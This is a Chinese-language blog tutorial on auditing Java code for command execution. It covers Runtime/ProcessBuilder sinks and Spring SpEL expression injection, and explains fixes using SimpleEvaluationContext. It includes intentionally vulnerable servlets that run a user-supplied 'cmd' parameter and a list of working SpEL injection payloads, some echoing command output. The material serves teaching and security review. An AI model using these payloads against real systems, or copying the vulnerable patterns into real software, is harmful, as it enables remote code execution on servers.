java代码审计8之命令执行

最新推荐文章于 2024-07-31 16:44:12 发布
最新推荐文章于 2024-07-31 16:44:12 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 代码审计 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43970718/article/details/132092687
版权
本文详细介绍了Java中执行系统命令的Runtime、ProcessBuilder和ProcessImpl方法,以及SpEL表达式在Spring框架中的使用,展示了潜在的安全漏洞,并提供了修复建议。
摘要由CSDN通过智能技术生成

文章目录

之前的文章,
php代码审计12之命令执行

1、Java命令执行的函数

在Java中可用于执行系统命令的函数有三个:

	java.lang.Runtime
	
	java.lang.ProcessBuilder

	java.lang.ProcessImpl

三个方法的调用关系如下,可以看到,

其实是Runtime方法封装了ProcessBuilder方法,

而ProcessBuilder方式是封装了ProcessImpl方法

在这里插入图片描述

1.1、Runtime类

Runtime类是私有的,

类的对象无法通过这种方式注册:  Runtime r = new Runtime() ;

只能通过静态方法(getRuntime)获取: Runtime r = Runtime.getRuntime();

rce1Servlet.java

package com.example.demo;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;

@WebServlet("/rce1")
public class rce1Servlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        req.setCharacterEncoding("utf-8");
        resp.setCharacterEncoding("utf-8");
        resp.setContentType("text/html; charset=utf-8");
        String cmd = req.getParameter("cmd");
        StringBuffer sb = new StringBuffer();
        BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
        String line;
        while ((line=br.readLine())!=null){
            sb.append(line).append("</br>");
        }
        br.close();
        resp.getWriter().write(sb.toString());
    }
}


访问,

http://localhost:8080/rce1?cmd=calc

在这里插入图片描述

1.2、追踪三个函数的关系

直接跟进exec函数,一直“ctrl+点击exec”函数,

在这里插入图片描述

最终可以跟到,是调用的ProcessBuilder类的start函数,

在这里插入图片描述

继续跟进start函数,看到调用的是ProcessImpl.start

与上边的图一致,

在这里插入图片描述

1.3、ProcessBuilder类

这种复现本质意义不大,重点是记一下敏感函数,

rce2Servlet.java

package com.example.demo;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

@WebServlet("/rce2")
public class rce2Servlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        req.setCharacterEncoding("utf-8");
        resp.setCharacterEncoding("utf-8");
        resp.setContentType("text/html; charset=utf-8");
        String cmd = req.getParameter("cmd");
        String[] arrcmd={"cmd.exe","/c",cmd};
        StringBuffer sb = new StringBuffer();
        ProcessBuilder processBuilder= new ProcessBuilder(arrcmd);
        Process process = processBuilder.start();
        BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()));
        String line;
        while ((line=br.readLine())!=null){
            sb.append(line).append("</br>");
        }
        br.close();
        resp.getWriter().write(sb.toString());
    }
}

访问,
http://localhost:8080/rce1?cmd=calc
在这里插入图片描述

1.4、ProcessImpl类

ProcessImpl类通常是为ProcessBuilder.start()创建新进程服务的,不能直接去调用。

看到ProcessImpl类构造器私有,所以不能直接对其进行实例化,为了演示可以用反射进行调用。

在获取到一个静态方法后,必须用setAccessible修改它的作用域,否则不能调用。

在这里插入图片描述

2、SpEL表达式

SpEL(Spring Expression Language),即Spring表达式语言,是比JSP的EL更强大的一种表达式语言。

从Spring 3开始引入了Spring表达式语言,支持在运行时查询和操作对象图,

可以与基于XML和基于注解的Spring配置还有bean定义一起使用。

SpEL的用法有三种形式,

一种是在注解@Value中;

一种是XML配置;

一种是在代码块中使用Expression。

各种Spring CVE漏洞都是基于Expression形式的SpEL表达式注入

2.1、正常使用的场景

@RequestMapping("/spel")
    @ResponseBody
    public String spel(String input){
        SpelExpressionParser parser = new SpelExpressionParser();
		Expression expression = parser.parseExpression(input);
		return expression.getValue().toString();
}

直接将用户的输入当作表达式内容进行解析。

输入一个简单的乘法运算2*2,可以看到返回的值是经过解析后的4

在这里插入图片描述
我们来模拟下,

        String  input = "2*2";
        SpelExpressionParser parser = new SpelExpressionParser();
        Expression expression = parser.parseExpression(input);
        System.out.println(expression.getValue().toString());

在这里插入图片描述

2.2、造成漏洞

上边的input是用户可控的,

当用户传入恶意参数,就会执行命令

        //String  input = "2*2";
        String input = "T(java.lang.Runtime).getRuntime().exec('calc')";
        SpelExpressionParser parser = new SpelExpressionParser();
        Expression expression = parser.parseExpression(input);
        System.out.println(expression.getValue().toString());

在这里插入图片描述
**Spel漏洞的原理:**

SpEL表达式是可以操作类及其方法的,可以通过类型表达式T(Type)来调用任意类方法。

T(Type) 运算符会调用类的作用域和方法;SpEL内置了 java.lang 包下的类声明


在不指定 EvaluationContext 的情况下默认采用的是 StandardEvaluationContext,

而它包含了SpEL的所有功能,允许用户在可以控制输入的情况下成功造成任意代码执行。

2.3、漏洞修复

EvaluationContext:这是一个通用的上下文接口,用于在SpEL表达式中传递变量和方法调用。

它包含了一些基本的属性访问器,


如getProperty()和setProperty(),以及一些方法,如setVariable()和getVariable()。

通过实现这个接口,可以在SpEL表达式中使用任意类型的变量和方法。


SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext,

SimpleEvaluationContext是一个简化版的EvaluationContext,
	
		仅支持SpEL语言语法的一个子集,不包括Java类型引用、构造函数和 bean引用。
		
		不会造成漏洞(一般用来修复造成的漏洞)

StandardEvaluationContext是完整版的EvaluationContext
		
		支持全部SpEL语法,在不指定EvaluationContext的情况下,默认使用此方法。
		
		会造成漏洞

所以我们在上边造成漏洞的代码内,没有任何和“StandardEvaluationContext”相关的代码,

但是仍然造成了漏洞,

//没有出现“StandardEvaluationContext”

		String input = "T(java.lang.Runtime).getRuntime().exec('calc')";
        SpelExpressionParser parser = new SpelExpressionParser();
        Expression expression = parser.parseExpression(input);
        System.out.println(expression.getValue().toString());

这段代码的功能和下边一致,

        //String  input = "2*2";
        String input = "T(java.lang.Runtime).getRuntime().exec('calc')";
        SpelExpressionParser parser = new SpelExpressionParser();
        EvaluationContext context = new StandardEvaluationContext();
        Expression expression = parser.parseExpression(input);
        System.out.println(expression.getValue(context).toString());

在这里插入图片描述

了解上述之后,修复就比较简单了,正常功能没问题,

        String  input = "2*2";
        //String input = "T(java.lang.Runtime).getRuntime().exec('calc')";
        SpelExpressionParser parser = new SpelExpressionParser();

        // 创建一个安全的EvaluationContext
        SimpleEvaluationContext simpleContext = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        
        Expression expression = parser.parseExpression(input);
        System.out.println(expression.getValue(simpleContext).toString());

在这里插入图片描述

运行恶意代码就会报错,

在这里插入图片描述

比如 CVE-2018-1273 的修复方式就和我们上边几乎一致,

将StandardEvaluationContext换为SimpleEvaluationContext

在这里插入图片描述

2.4、多种产生漏洞的情况

第一种,

T(java.lang.Runtime).getRuntime().exec("calc")

完整漏洞代码,

package com.example.controller;

import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
import org.springframework.expression.Expression;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.bind.annotation.RestController;

@RestController
@EnableAutoConfiguration
public class Index {
    @ResponseBody
    @RequestMapping(value = "/spel", method = {RequestMethod.GET, RequestMethod.POST})
    public String spel(String cmd){
        SpelExpressionParser parser = new SpelExpressionParser(); 创建ExpressionParser解析表达式
//        TemplateParserContext templateParserContext = new TemplateParserContext();
//       Expression expression = parser.parseExpression(cmd,templateParserContext);
        Expression expression = parser.parseExpression(cmd);
        return expression.getValue().toString();

    }
}

在这里插入图片描述
第二种,

new java.lang.ProcessBuilder("calc").start()

代码和上边一致,

在这里插入图片描述
第三种,

cmd=#{2*2}

这种直接传参是会报错的,需要一个模板引擎,

在这里插入图片描述

这种需要post传参,测试get会报错,即使url编码“#”

在这里插入图片描述
一个问题是这种如何传递前两种方式呢,直接传就回显了
在这里插入图片描述
放到括号就ok了,

#{T(java.lang.Runtime).getRuntime().exec("calc")}

#{new java.lang.ProcessBuilder("calc").start()}

在这里插入图片描述

但是上边的两种么有回显,稍微改下就行了,

#{new java.util.Scanner(new java.lang.ProcessBuilder("cmd", "/c", "ipconfig /all").start().getInputStream(), "GBK").useDelimiter("asfsfsdfsf").next()}

小结,

、、正常无回显
T(java.lang.Runtime).getRuntime().exec("calc")
new java.lang.ProcessBuilder("calc").start()

、、正常有回显
new java.util.Scanner(new java.lang.ProcessBuilder("cmd", "/c", "ipconfig /all").start().getInputStream(), "GBK").useDelimiter("asfsfsdfsf").next()


、、模板的无回显,就将上面的payload放到“ #{} ”
#{T(java.lang.Runtime).getRuntime().exec("calc")}
#{new java.lang.ProcessBuilder("calc").start()}

、、模板有回显,就将上面的payload放到“ #{} ”
#{new java.util.Scanner(new java.lang.ProcessBuilder("cmd", "/c", "ipconfig /all").start().getInputStream(), "GBK").useDelimiter("asfsfsdfsf").next()}

2.5、发现漏洞,重要关注两点:

存在new SpelExpressionParser()		、、表示创建了spel的解析器(使用spel技术)

parseExpression(spel)				、、参数spel可控( 解析表达式 )

String spel = "new java.util.Date()";

ExpressionParser parser = new SpelExpressionParser();

Expression expression = parser.parseExpression(spel);

System.out.println(expression.getValue());
划水的小白白
关注
专栏目录
Java代码审计命令执行漏洞
悦分享
08-02 926
执行了ls&&结果报错,看显示结果发现过滤了&&,然后把&转编码发现还是会报错,但是从服务端代码来看并没有做参数的过滤。从代码中可以看出来程序只使用trim()方法对jdk进行了两遍的空格过滤,然后直接和后面拼接的命令一起执行。上面的代码显示jdk这个参数是从请求中获取的,看到这里已经能确定是个命令执行漏洞了,下面我们来利用这个漏洞。可以看到这里依次调用了3个命令执行的方法,如果命令都能成功执行的话,可以执行3次。进行代码审计时遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。...
Java代码审计之远程命令执行漏洞(REC)详解
悦分享
01-23 527
在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。RCE漏洞,可让攻击者直接向后台服务器远程注入操做系统命令或者代码,从而控制后台系统。很多人喜欢把代码执行漏洞称为命令执行漏洞,因为命令执行漏洞可以执行系统命令,而代码执行漏洞也会执行系统命令,这样就容易混淆。
通过JAVA执行命令行程序
08-17
文件中包含两个方法,一个是读取文件路径下的文件列表,另一个是通过JAVA调用命令行程序,涉及到线程阻塞问题
Java代码审计命令执行
liguangyao213的博客
03-13 2345
java代码审计系统课程--代码审计视频教程-信息安全-CSDN程序员研修院少写“漏洞” 了解常见代码安全 提升代码安全能力 代码不被黑客黑-https://edu.csdn.net/course/detail/32634 命令执行(CommandInject) codeinject 访问url为http://localhost:8080/codeinject?filepath=src%26%26ipconfig 获取一个参数filepath,然后通过ProcessBuilder将数组cmdList
java代码审计--命令执行
goddemon
09-15 668
1.java常用执行系统命令函数 Runtime.exec Process GroovyShell.evaluate ProcessBuilder.start() 2.补充知识点 Process类方法: 1.destroy() 杀掉子进程。 2.exitValue() 返回子进程的出口值。 3.InputStream getErrorStream() 获得子进程的错误流。 4.InputStream getInputStream() 获得子进程的输入流。 5.OutputStream getOutput
Java代码审计-命令执行
最新发布
qq_44780157的博客
07-31 1643
Java代码审计-命令执行
runtime调用命令行运行bat文件
愤怒的coder
02-23 1338
package com;import java.io.IOException; public class JavaRunDoc {     public static void main(String args[]) {      try   {               Runtime.getRuntime().exec("d:\\a.bat");        }catch(IOEx...
Java代码审计工程师 视频教程 下载 百度网盘链接2.zip
06-19
├─20.实验课程作业 │ 10_业务逻辑漏洞.pdf │ 11_SQL注入漏洞.pdf │ 12_文件上传&目录遍历漏洞.pdf │ 13_命令执行(代码执行).pdf ...代码审计及SDL岗位面试总结.pdf 9.XSS漏洞审计.pdf
JAVA代码审计常用漏洞总结
12-11
主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯: 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑 可以是一个函数,或者是条小小的条件判断语句。 敏感函数参数回溯,...
Java代码审计工程师 视频教程 下载 百度网盘链接4.zip
06-19
├─20.实验课程作业 │ 10_业务逻辑漏洞.pdf │ 11_SQL注入漏洞.pdf │ 12_文件上传&目录遍历漏洞.pdf │ 13_命令执行(代码执行).pdf ...代码审计及SDL岗位面试总结.pdf 9.XSS漏洞审计.pdf
Java 命令执行
qq_33817108的博客
12-05 205
方式一:java.lang.Runtime。方法三:利用 ProcessBuilder。执行系统“whoami” 命令并返回结果。方法四:Native + 反射 执行命令。方法二:利用反射调用Runtime。方法五:JNI命令执行
Java 命令执行 学习笔记
feng的博客
08-09 860
前言 开始学习一下Java命令执行,虽然都是一些很小的知识点,但是还是每个知识点都写篇博客总结一下。 考虑到自己刚学Java,很多的东西都不太懂,太多的类没见过,不知道怎么用,很多概念不懂,就连学过的东西也一直在忘,所以这种学习新东西的过程中,我更多的还是把握住,主要的知识点。比如后面的看Runtime的exec方法的调用链,自己也看不懂细节上的东西,只要能把握住,整体的调用链是这样的,就可以了,更加细节的东西,等自己以后慢慢学习的深入了,再慢慢的回头看。 Runtime Runtime类,顾名思义就是运
Java代码审计】本地命令执行函数
网络安全从业者的学习笔记
02-20 548
在服务器中时常会调用命令执行的代码,以完善或加强系统的功能需求,一旦这些调用命令执行的接口被攻击者恶意利用,就会导致服务器沦陷。
学习笔记-java代码审计-命令执行
人饭子的博客
11-13 434
java代码审计-命令执行 0x01 漏洞挖掘 String cmd = request.getParameter("cmd"); Runtime runtime = Runtime.getRuntime(); //Runtime.getRuntime.exec ProcessBuilder processBuilder = new ProcessBuilder(cmd); //ProcessB...
java中的命令执行汇总
Thunderclap的博客
08-21 6446
命令执行漏洞只关注 第一个或者如果该参数完全可控,或者是/bin/bash(Linux)或cmd(Windows)等运行shell解析器的命令、后面的部分可控,则可以注入。如果的哥参数是bat或者sh脚本文件,后面的参数可控,则需要根据脚本如何使用可控参数来判断是否可以注入。ScriptEngine接口:可使用ScriptEngine.eval解析多种脚本,比如JavaScript,而JavaScript中可以执行java命令
Java执行存储过程和函数(web基础学习笔记十四)
weixin_33750452的博客
01-29 131
一、概述 如果想要执行存储过程,我们应该使用 CallableStatement 接口。 CallableStatement 接口继承自PreparedStatement 接口。所以CallableStatement 接口包含有Statement 接口和PreparedStatement 接口定义的全部方法,但是并不是所有的方法我们都要使用,主要使用的方法有这样几个: CallableSta...
Java本地命令执行
qq_62046696的博客
03-15 1512
本来文件叫做 null-bytes.txt\u000.jpg却变成了,null-bytes.txt,把后面的截断了,大多数出现这种漏洞的地方。文件上传,判断后缀jpg但是其实存的是前面txt的后缀,这不就是php%00截断的原理吗,基本一样就不细说了。直接构造这个类发现也进去了这个方法,但是弹不出来肯定是某些变量的值的限制,哪天闲了我深层搞一搞。前言:本来想安装一个自己搞搞,但是jdk版本太低了不兼容,还好很容易理解。代码就一行满屏的报错,还是500真的是累了,唉先看懂原理明天调试把。
命令执行java程序
levelhi的博客
10-27 2342
命令执行java程序(转载整理) 参考: http://blog.csdn.net/lee_decimal/article/details/5885406 https://yq.aliyun.com/articles/35201 http://longdick.iteye.com/blog/332580 http://www.cnblogs.com/huhu0013/archive
Java 命令执行笔记
snowlyzz的博客
11-02 1226
JAVA命令执行学习
Java代码审计:漏洞来源与挑战
在本篇关于Java代码审计的文章中,主要讨论了两个关键方面:程序员编码不当引发的安全问题和第三方组件使用不当所导致的风险。 首先,文章指出程序员在编码过程中存在的问题。编码不当往往源于对安全性的忽视,比如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

划水的小白白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值